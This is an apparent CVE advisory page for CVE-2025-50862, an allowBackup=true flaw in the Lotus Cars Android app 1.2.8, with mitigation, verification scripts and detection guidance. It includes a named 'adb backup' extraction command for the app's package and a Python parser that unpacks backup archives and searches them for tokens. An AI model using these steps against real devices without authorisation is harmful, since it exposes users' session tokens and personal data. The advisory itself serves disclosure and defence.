CVE-2025-50862
📋 TL;DR
The Lotus Cars Android app (version 1.2.8) ships with android:allowBackup="true" in its manifest. Anyone with physical access to a device that has USB debugging enabled can therefore pull the app's private data with `adb backup`; root is not required (a rooted device can read the app's data directory regardless of this flag). What is exposed is whatever the app stores locally, potentially including sensitive user data such as cached session tokens. Only this version of the Android app is reported as affected.
💻 Affected Systems
- Lotus Cars Android app
⚠️ Manual Verification Required
The database entry for this CVE carries no affected-version range, so automated, version-based detection cannot decide whether your installation is affected.
Why? The NVD record provides no version ranges from the vendor; only the description names version 1.2.8.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete exfiltration of all app data including user credentials, personal information, vehicle data, and any locally stored sensitive information from vulnerable devices.
Likely Case
Exposure of user preferences, cached data, and potentially authentication tokens from rooted or developer-enabled devices.
If Mitigated
No data exposure if devices are not rooted, USB debugging is disabled, and physical access controls are enforced.
🎯 Exploit Status
Exploitation needs physical access to the device and an ADB session (USB debugging enabled and the attacking host authorised on the device); root is not required, but a rooted device makes the manifest flag irrelevant. On Android 12 and later, `adb backup` only exports data for apps built with android:debuggable="true", so a release build of the app is not dumpable on those devices even with allowBackup=true. Not remotely exploitable.
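What an attacker actually obtains is an Android backup archive, e.g. from `adb backup -f lotus.ab -noapk com.lotus.carsdomestic.intl`. The following is an added example (not part of this advisory or the vendor's code) that parses the .ab container and lists the app files inside it; the sample archive is constructed in the script so it runs offline, and the member names and the token value in it are made up for illustration.

```python
"""Unpack an unencrypted Android backup (.ab) file as written by `adb backup`.

Layout: four text lines ("ANDROID BACKUP", format version, compressed flag
1/0, encryption "none" or "AES-256") followed by a tar archive, which is
zlib-compressed when the flag is 1. Encrypted backups add further header
lines (salts, wrapped key) and are deliberately rejected here.
"""
import io
import tarfile
import zlib

AB_MAGIC = b"ANDROID BACKUP\n"


def parse_ab_header(data: bytes):
    """Return (version, compressed, encryption, payload) for an .ab file."""
    if not data.startswith(AB_MAGIC):
        raise ValueError("not an Android backup file")
    # maxsplit=4 leaves the binary payload uncut even if it contains newlines
    parts = data.split(b"\n", 4)
    if len(parts) < 5:
        raise ValueError("truncated .ab header")
    version = int(parts[1])
    compressed = parts[2] == b"1"
    encryption = parts[3].decode("ascii")
    return version, compressed, encryption, parts[4]


def ab_to_tar(data: bytes) -> bytes:
    """Strip the header and return the raw tar bytes."""
    _version, compressed, encryption, payload = parse_ab_header(data)
    if encryption != "none":
        raise ValueError(f"backup is encrypted ({encryption}); not handled here")
    return zlib.decompress(payload) if compressed else payload


def list_backup(data: bytes) -> dict:
    """Map every regular file in the backup to its contents."""
    files = {}
    with tarfile.open(fileobj=io.BytesIO(ab_to_tar(data)), mode="r:") as tf:
        for member in tf.getmembers():
            if member.isfile():
                files[member.name] = tf.extractfile(member).read()
    return files


def grep_backup(files: dict, needle: bytes) -> list:
    """Names of members whose content contains `needle`, e.g. b"token"
    to triage shared preferences for session material."""
    return sorted(name for name, body in files.items() if needle in body)


def make_sample_ab(pkg: str, contents: dict) -> bytes:
    """Build a CONSTRUCTED, unencrypted .ab file for offline testing.
    `adb backup` stores app files as apps/<pkg>/<kind>/<file>."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:") as tf:
        for rel, body in contents.items():
            info = tarfile.TarInfo(f"apps/{pkg}/{rel}")
            info.size = len(body)
            tf.addfile(info, io.BytesIO(body))
    return AB_MAGIC + b"5\n1\nnone\n" + zlib.compress(buf.getvalue())


# Constructed sample standing in for a real device dump (assumed file names)
SAMPLE_PKG = "com.lotus.carsdomestic.intl"
SAMPLE_AB = make_sample_ab(SAMPLE_PKG, {
    "sp/session.xml": b'<map><string name="auth_token">constructed-token-value</string></map>',
    "db/cache.db": b"SQLite format 3\x00constructed",
})

if __name__ == "__main__":
    found = list_backup(SAMPLE_AB)
    for name, body in found.items():
        print(name, len(body), "bytes")
    print("members mentioning a token:", grep_backup(found, b"token"))
```

Pointing `list_backup` at the bytes of a real `lotus.ab` is the whole extraction step; the shared-preferences and database members it returns are exactly the "likely case" data listed above.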
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Version >1.2.8 with allowBackup=false in manifest
Vendor Advisory: http://lotus.com
Restart Required: No
Instructions:
1. Update the Lotus Cars app to the latest version from the Google Play Store.
2. Verify the update installed successfully.
3. No device restart is required.
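The manifest change the fix comes down to, as an added before/after example (this is illustrative and not taken from the Lotus app's actual manifest; the label attribute is a placeholder):

```xml
<!-- Before (vulnerable): private files are exported by `adb backup` -->
<application
    android:label="@string/app_name"
    android:allowBackup="true">
    <!-- activities, services ... -->
</application>

<!-- After (fixed): the app opts out of adb backup and of cloud Auto Backup -->
<application
    android:label="@string/app_name"
    android:allowBackup="false">
    <!-- activities, services ... -->
</application>
```

Setting allowBackup to false also disables Google Auto Backup for the app; an app that needs cloud backup but must keep files such as token stores out of it can instead keep backup enabled and exclude those files with android:fullBackupContent (and, when targeting Android 12 or later, android:dataExtractionRules).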
🔧 Temporary Workarounds
Disable USB Debugging
Platform: Android. Prevents ADB access, which exploitation requires.
Settings > Developer Options > USB debugging (toggle OFF)
Disable Developer Options
Platform: Android. Completely disables developer features, including ADB.
Settings > Developer Options > Turn OFF (if available) or Settings > System > Developer options > Disable
🧯 If You Can't Patch
- Disable USB debugging on all devices
- Implement physical security controls to prevent unauthorized device access
🔍 How to Verify
Check if Vulnerable:
Check the package flags: adb shell dumpsys package com.lotus.carsdomestic.intl | grep -E '^ *flags='. dumpsys reports the manifest setting as the flag name ALLOW_BACKUP on that line (it does not print allowBackup=true), so if ALLOW_BACKUP is listed the app is vulnerable. To read the manifest itself, pull the installed APK (adb shell pm path com.lotus.carsdomestic.intl, then adb pull of that path) and run aapt dump xmltree base.apk AndroidManifest.xml | grep allowBackup.
Check Version:
adb shell dumpsys package com.lotus.carsdomestic.intl | grep versionName
Verify Fix Applied:
After the update, run the same commands. The flags line should no longer list ALLOW_BACKUP, and the manifest dump should show allowBackup set to false (or, if the attribute is absent, confirm the app's data is not exportable by running adb backup against it).
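The same verification as a script, added here as an example rather than a vendor-supplied check: it parses `dumpsys package` output for the ALLOW_BACKUP and DEBUGGABLE flags and the versionName, and combines them with the device's API level to say whether `adb backup` would actually work. The sample dumpsys excerpts below are constructed in the shape dumpsys prints, not captured from a real device; the `live_dumpsys` helper is only used when run against an attached device.

```python
"""Decide from `adb shell dumpsys package <pkg>` output whether an app can be
dumped with `adb backup`. dumpsys reports manifest settings as flag names on
a `flags=[ ... ]` line (ALLOW_BACKUP, DEBUGGABLE, ...), never as
allowBackup=true/false."""
import re
import subprocess

PACKAGE = "com.lotus.carsdomestic.intl"

# First `flags=[...]` line of the package dump; `^\s*flags=` does not match
# the separate `privateFlags=[...]` line.
FLAGS_RE = re.compile(r"^\s*flags=\[([^\]]*)\]", re.MULTILINE)
VERSION_RE = re.compile(r"^\s*versionName=(\S+)", re.MULTILINE)


def package_flags(dumpsys_text: str) -> set:
    """Set of flag names from the package's flags line (empty if absent)."""
    m = FLAGS_RE.search(dumpsys_text)
    return set(m.group(1).split()) if m else set()


def version_name(dumpsys_text: str):
    """versionName as printed by dumpsys, or None."""
    m = VERSION_RE.search(dumpsys_text)
    return m.group(1) if m else None


def assess(dumpsys_text: str, device_sdk: int) -> dict:
    """device_sdk is the value of `adb shell getprop ro.build.version.sdk`.
    From Android 12 (API 31) `adb backup` only honours ALLOW_BACKUP for
    debuggable builds, so a release app on a newer device is not dumpable
    even though the manifest is still weak."""
    flags = package_flags(dumpsys_text)
    allow_backup = "ALLOW_BACKUP" in flags
    debuggable = "DEBUGGABLE" in flags
    return {
        "version": version_name(dumpsys_text),
        "allow_backup": allow_backup,
        "debuggable": debuggable,
        "adb_backup_possible": allow_backup and (device_sdk < 31 or debuggable),
    }


def live_dumpsys(pkg: str = PACKAGE) -> str:
    """Fetch real output from an attached device (needs adb on PATH)."""
    return subprocess.run(
        ["adb", "shell", "dumpsys", "package", pkg],
        capture_output=True, text=True, check=True,
    ).stdout


# Constructed excerpts in the shape dumpsys prints; not captured from a device.
SAMPLE_VULNERABLE = """\
Packages:
  Package [com.lotus.carsdomestic.intl] (1a2b3c4):
    userId=10231
    versionCode=128 minSdk=24 targetSdk=30
    versionName=1.2.8
    flags=[ HAS_CODE ALLOW_CLEAR_USER_DATA ALLOW_BACKUP ]
    privateFlags=[ PRIVATE_FLAG_ACTIVITIES_RESIZE_MODE_RESIZEABLE_VIA_SDK_VERSION ]
"""

# Same package after a build with allowBackup="false": the flag disappears.
SAMPLE_FIXED = SAMPLE_VULNERABLE.replace(" ALLOW_BACKUP", "")

if __name__ == "__main__":
    text = live_dumpsys()
    sdk = int(subprocess.check_output(
        ["adb", "shell", "getprop", "ro.build.version.sdk"]).strip())
    print(assess(text, sdk))
```

Note that the same weak manifest yields `adb_backup_possible: False` on an Android 13 device, which is why the Exploit Status section distinguishes the flag from actual exploitability.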
📡 Detection & Monitoring
Log Indicators:
- ADB backup commands in device logs
- Unauthorized ADB connections
Network Indicators:
- ADB protocol traffic over USB or, when wireless debugging is enabled, over the network (classic adb-over-TCP listens on port 5555)
SIEM Query:
source="android_device" AND (event="adb_backup" OR process="adb" AND command="backup")